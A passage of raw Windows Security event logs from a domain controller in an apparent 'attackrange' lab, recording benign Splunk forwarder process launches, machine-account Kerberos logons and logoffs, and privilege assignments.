Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1910
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:27:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264654
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf74
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:27:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264653
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1744
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:27:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264655
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x868
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:27:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264657
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xfe4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:27:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264656
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1ac8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:27:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264658
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1360
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264664
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84A8E0
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264663
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x84A8E0
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53556
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264662
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84A8E0
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264661
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84A874
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264660
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x84A874
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53555
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264659
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84A874
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:27:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264667
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84B54C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:27:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264666
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x84B54C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53564
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:27:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264665
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84B54C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:28:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264668
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1540
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:28:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264670
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13fc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:28:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264669
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17b8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:28:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264671
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1944
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:28:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264672
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1964
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:28:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264674
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1834
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:28:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264673
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x5e4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:28:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264677
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84EFC3
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:28:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
